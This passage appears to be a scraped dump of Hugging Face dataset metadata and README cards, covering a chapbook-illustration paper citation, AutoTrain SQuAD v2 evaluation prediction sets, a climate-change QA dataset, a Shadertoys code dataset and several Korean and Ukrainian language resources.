quantities in Scotland, England, Ireland, North America and much of Europe between roughly the seventeenth and nineteenth centuries. A form of popular literature containing songs, stories, poems, games, riddles, religious writings and other content designed to appeal to a wide readership, they were frequently illustrated, particularly on their title-pages. This paper describes the visual analysis of such chapbook illustrations. We automatically extract all the illustrations contained in the National Library of Scotland Chapbooks Printed in Scotland dataset, and create a visual search engine to search this dataset using full or part-illustrations as queries. We also cluster these illustrations based on their visual content, and provide keyword-based search of the metadata associated with each publication. The visual search; clustering of illustrations based on visual content; and metadata search features enable researchers to forensically analyse the chapbooks dataset and to discover unnoticed relationships between its elements. We release all annotations and software tools described in this paper to enable reproduction of the results presented and to allow extension of the methodology described to datasets of a similar nature.}, booktitle = {The 6th International Workshop on Historical Document Imaging and Processing}, pages = {67–72}, numpages = {6}, keywords = {illustration detection, chapbooks, image search, visual grouping, printing, digital scholarship, illustration dataset}, location = {Lausanne, Switzerland}, series = {HIP '21} } ``` ### Contributions Thanks to [@davanstrien](https://github.com/davanstrien) and Giles Bergel for adding this dataset.
lonestar108
null
null
null
false
1
false
lonestar108/qd50
2022-07-24T00:42:38.000Z
null
false
000fe345b3d7c2d741654a12ccbffa2a0e5beec6
[]
[ "license:cc-by-4.0" ]
https://huggingface.co/datasets/lonestar108/qd50/resolve/main/README.md
--- license: cc-by-4.0 ---
lonestar108
null
null
null
false
1
false
lonestar108/qd100
2022-07-23T23:59:24.000Z
null
false
59b78b3485f2c9c91ebc2161cdefb94e6acaebb7
[]
[ "license:cc-by-4.0" ]
https://huggingface.co/datasets/lonestar108/qd100/resolve/main/README.md
--- license: cc-by-4.0 ---
Gpaiva
null
null
null
false
2
false
Gpaiva/NERDE_sentences
2022-07-24T00:22:44.000Z
null
false
6aa087d61c9aa8bb123ef1d8ecaac7b1bbd55d05
[]
[ "license:cc-by-4.0" ]
https://huggingface.co/datasets/Gpaiva/NERDE_sentences/resolve/main/README.md
--- license: cc-by-4.0 ---
Pligabue
null
null
null
false
1
false
Pligabue/BLAB_KG
2022-07-24T03:52:47.000Z
null
false
76fcebe426935e35713fd378b3de34e05581578e
[]
[ "license:mit" ]
https://huggingface.co/datasets/Pligabue/BLAB_KG/resolve/main/README.md
--- license: mit ---
apoulos
null
null
null
false
1
false
apoulos/Fork-test
2022-07-24T06:05:16.000Z
null
false
08ebcd44475da03e21fef856c051b8c98639ed6e
[]
[ "license:unknown" ]
https://huggingface.co/datasets/apoulos/Fork-test/resolve/main/README.md
--- license: unknown ---
apoulos
null
null
null
false
1
false
apoulos/GFPGAN-fork
2022-07-24T06:25:08.000Z
null
false
17a36adb411ff1fea0d7dd861faa580e7839aac2
[]
[ "license:unknown" ]
https://huggingface.co/datasets/apoulos/GFPGAN-fork/resolve/main/README.md
--- license: unknown ---
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-squad_v2-2eb94bfa-11695556
2022-07-24T08:23:49.000Z
null
false
0bafa7af1ec5ff70f682f40196ebc18708f8d27f
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad_v2" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-squad_v2-2eb94bfa-11695556/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad_v2 eval_info: task: extractive_question_answering model: deepset/minilm-uncased-squad2 metrics: [] dataset_name: squad_v2 dataset_config: squad_v2 dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: deepset/minilm-uncased-squad2 * Dataset: squad_v2 * Config: squad_v2 * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@ghpkishore](https://huggingface.co/ghpkishore) for evaluating this model.
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-squad_v2-2eb94bfa-11695557
2022-07-24T08:25:16.000Z
null
false
0012c270d0bd91ea80c924aa6dfdf9358394daa2
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad_v2" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-squad_v2-2eb94bfa-11695557/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad_v2 eval_info: task: extractive_question_answering model: deepset/tinyroberta-6l-768d metrics: [] dataset_name: squad_v2 dataset_config: squad_v2 dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: deepset/tinyroberta-6l-768d * Dataset: squad_v2 * Config: squad_v2 * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@ghpkishore](https://huggingface.co/ghpkishore) for evaluating this model.
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-squad_v2-2eb94bfa-11695558
2022-07-24T08:25:57.000Z
null
false
446bb59eac4bc07d261513dd87c75cc14d00df1b
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad_v2" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-squad_v2-2eb94bfa-11695558/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad_v2 eval_info: task: extractive_question_answering model: deepset/xlm-roberta-base-squad2 metrics: [] dataset_name: squad_v2 dataset_config: squad_v2 dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: deepset/xlm-roberta-base-squad2 * Dataset: squad_v2 * Config: squad_v2 * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@ghpkishore](https://huggingface.co/ghpkishore) for evaluating this model.
rony
null
null
null
false
1
false
rony/climate-change-MRC
2022-07-25T06:14:09.000Z
null
false
4eda02d5543e62650c00f8abd5b0cc1335b03088
[]
[ "license:mit" ]
https://huggingface.co/datasets/rony/climate-change-MRC/resolve/main/README.md
--- license: mit --- The Climate Change MRC dataset, also known as CCMRC, is a part of the work "Climate Bot: A Machine Reading Comprehension System for Climate Change Question Answering", accepted at IJCAI-ECAI 2022. The paper was accepted in the special system demo track "AI for Good". If you use the dataset, cite the following paper: ``` @inproceedings{rony2022climatemrc, title={Climate Bot: A Machine Reading Comprehension System for Climate Change Question Answering.}, author={Rony, Md Rashad Al Hasan and Zuo, Ying and Kovriguina, Liubov and Teucher, Roman and Lehmann, Jens}, booktitle={IJCAI}, year={2022} } ```
ntmkhanh
null
null
null
false
1
false
ntmkhanh/food
2022-07-24T12:59:52.000Z
null
false
6e047a1b02a1865e862da10fde74d21396ed845d
[]
[ "license:apache-2.0" ]
https://huggingface.co/datasets/ntmkhanh/food/resolve/main/README.md
--- license: apache-2.0 ---
Vipitis
null
null
null
false
13,481
false
Vipitis/Shadertoys
2022-11-05T22:50:34.000Z
null
false
039ad90d176f7f62bbd3e9a5e3c11743792da768
[]
[ "annotations_creators:no-annotation", "language:en", "language:code", "language_creators:machine-generated", "license:cc-by-nc-sa-3.0", "size_categories:10K<n<100K", "tags:code", "task_categories:text-generation", "task_categories:text-classification", "task_categories:translation" ]
https://huggingface.co/datasets/Vipitis/Shadertoys/resolve/main/README.md
--- annotations_creators: - no-annotation language: - en - code language_creators: - machine-generated license: - cc-by-nc-sa-3.0 multilinguality: [] pretty_name: Shadertoys size_categories: - 10K<n<100K source_datasets: [] tags: - code task_categories: - text-generation - text-classification - translation task_ids: [] --- # Dataset Card for Shadertoys-fine ## Table of Contents - [Table of Contents](#table-of-contents) - [Dataset Description](#dataset-description) - [Dataset Summary](#dataset-summary) - [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards) - [Languages](#languages) - [Dataset Structure](#dataset-structure) - [Data Instances](#data-instances) - [Data Fields](#data-fields) - [Data Splits](#data-splits) - [Dataset Creation](#dataset-creation) - [Source Data](#source-data) - [Licensing Information](#licensing-information) ## Dataset Description - **Repository:** https://github.com/Vipitis/project (private placeholder) ### Dataset Summary Shadertoys in the medium grained variant. Datapoints are renderpasses. ### Supported Tasks and Leaderboards `language-modeling`: The dataset can be used to train a model for modelling programming languages, which consists in building language models for programming languages. `text-classification`: The dataset can be used to classify text(title, description, comments) or code into labels like type or tags. `translation`: The Dataset can be used to translate from natural language (English) to programming language, or back. ### Languages - English (title, description, tags, comments) - Shadercode **programming** language ## Dataset Structure ### Data Instances A data point consists of the function string, it's name as well as a bit of metadata like the author and source URL. (in the future there might be a function string without comments) ``` { 'name': 'Image', 'type': 'image', 'code': '<full code>', 'title': '<title of the shader>', 'description': '<description of the shader>', 'tags': ['tag1','tag2','tag3', ... ], 'license': 'unknown', 'author': '<username>', 'source': 'https://shadertoy.com/view/<shaderID>' } ``` ### Data Fields - 'name' Name of the renderpass, usually Image, Buffer A, Common, etc - 'type' type of the renderpass; one of `{'buffer', 'common', 'cubemap', 'image', 'sound'}` - 'code' the raw code (including comments) the whole renderpass. - 'title' Name of the Shader - 'description' description given for the Shader - 'tags' List of tags assigned to the Shader (by it's creator); there are more than 10000 unique tags. - 'license' currently in development - 'author' username of the shader author - 'source' URL to the shader. Not to the specific renderpass. ### Data Splits Currently available (shuffled): - train (85.0%) - test (15.0%) ## Dataset Creation Data retrieved starting 2022-07-20 ### Source Data #### Initial Data Collection and Normalization All data was collected via the [Shadertoy.com API](https://www.shadertoy.com/howto#q2) and then iterated over the items in 'renderpass' while adding some of the fields from 'info'. The code to generate these datasets will be publish on the GitHub repository in the near future. #### Who are the source language producers? Shadertoy.com contributers which publish shaders as 'public+API' ## Licensing Information The Default [license for each Shader](https://www.shadertoy.com/terms) is CC BY-NC-SA 3.0. However, some Shaders might have a different license attached. The Dataset is currently not filtering for any licenses. A new data field is currently being developed to annotate if any other license applies to a shader.
nateraw
null
@InProceedings{huggingface:dataset, title = {A great new dataset}, author={huggingface, Inc. }, year={2020} }
This new dataset is designed to solve this great NLP task and is crafted with a lot of care.
false
1
false
nateraw/sqllitetest
2022-07-24T19:44:41.000Z
null
false
bb5c85533e51ecd070d479ccb23e10c92bed9dfe
[]
[ "license:mit" ]
https://huggingface.co/datasets/nateraw/sqllitetest/resolve/main/README.md
--- license: mit ---
nateraw
null
@InProceedings{huggingface:dataset, title = {A great new dataset}, author={huggingface, Inc. }, year={2020} }
This new dataset is designed to solve this great NLP task and is crafted with a lot of care.
false
1
false
nateraw/snowflaketest
2022-08-01T16:20:03.000Z
null
false
fbb486cd44835e75f925e1318193c0b77da9c0cc
[]
[ "license:mit" ]
https://huggingface.co/datasets/nateraw/snowflaketest/resolve/main/README.md
--- license: mit ---
devmehta787
null
null
null
false
1
false
devmehta787/wav2vec2-xlsr-hindi
2022-07-25T08:28:19.000Z
null
false
c876612cc6bf2807af9ec786b6303390d47ecd9d
[]
[ "license:afl-3.0" ]
https://huggingface.co/datasets/devmehta787/wav2vec2-xlsr-hindi/resolve/main/README.md
--- license: afl-3.0 ---
Yehor
null
null
null
false
1
false
Yehor/uk-stresses
2022-07-28T13:57:39.000Z
null
false
3beff0e67d14889b60f313701a936360828e1283
[]
[ "tags:uk" ]
https://huggingface.co/datasets/Yehor/uk-stresses/resolve/main/README.md
--- tags: - uk --- This repository contains a slightly modified version of https://github.com/lang-uk/ukrainian-word-stress-dictionary to be used in Text-to-Speech project based on Tacoctron 2
jack66931
null
null
null
false
1
false
jack66931/ClassTest
2022-07-24T21:30:41.000Z
null
false
cdef59ebbf0590d84506524cf199a419c036f728
[]
[ "license:unknown" ]
https://huggingface.co/datasets/jack66931/ClassTest/resolve/main/README.md
--- license: unknown ---
bongsoo
null
null
null
false
933
false
bongsoo/kowiki20220620
2022-10-05T00:08:42.000Z
null
false
47e32b8a853777f36903af82a1008f5d3f230d2a
[]
[ "language:ko", "license:apache-2.0" ]
https://huggingface.co/datasets/bongsoo/kowiki20220620/resolve/main/README.md
--- language: - ko license: apache-2.0 --- -kowiki202206 1줄 말뭉치
actdan2016
null
null
null
false
1
false
actdan2016/dandna
2022-10-13T06:39:19.000Z
null
false
f851e9309b7e3160f513f254bf9d98976d162d6c
[]
[]
https://huggingface.co/datasets/actdan2016/dandna/resolve/main/README.md
bongsoo
null
null
null
false
21
false
bongsoo/bongevalsmall
2022-10-04T23:48:22.000Z
null
false
79cedccdca57aee5a769b1898987f489c8aa3b8b
[]
[ "language:ko", "license:apache-2.0" ]
https://huggingface.co/datasets/bongsoo/bongevalsmall/resolve/main/README.md
--- language: - ko license: apache-2.0 --- - 평가 말뭉치
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-squad_v2-fdec2e9c-11705559
2022-07-25T07:29:26.000Z
null
false
8e5abafb2af8f768229735214b911e7aa9c7603b
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad_v2" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-squad_v2-fdec2e9c-11705559/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad_v2 eval_info: task: extractive_question_answering model: deepset/xlm-roberta-large-squad2 metrics: [] dataset_name: squad_v2 dataset_config: squad_v2 dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: deepset/xlm-roberta-large-squad2 * Dataset: squad_v2 * Config: squad_v2 * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model.
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-squad_v2-8b8e12f7-11715560
2022-07-25T07:33:16.000Z
null
false
a6036b2dcc7768e2940fcab790fd0a42fa5a387d
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad_v2" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-squad_v2-8b8e12f7-11715560/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad_v2 eval_info: task: extractive_question_answering model: deepset/roberta-large-squad2 metrics: ['squad_v2'] dataset_name: squad_v2 dataset_config: squad_v2 dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: deepset/roberta-large-squad2 * Dataset: squad_v2 * Config: squad_v2 * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model.
autoevaluate
null
null
null
false
2
false
autoevaluate/autoeval-staging-eval-project-squad-810261fd-11725561
2022-07-25T09:36:36.000Z
null
false
eee0a8ef4396cb4882284ec2fda1d0ccfd8d5550
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:squad" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-squad-810261fd-11725561/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - squad eval_info: task: extractive_question_answering model: Shanny/bert-finetuned-squad metrics: ['accuracy'] dataset_name: squad dataset_config: plain_text dataset_split: validation col_mapping: context: context question: question answers-text: answers.text answers-answer_start: answers.answer_start --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Question Answering * Model: Shanny/bert-finetuned-squad * Dataset: squad * Config: plain_text * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@ola13](https://huggingface.co/ola13) for evaluating this model.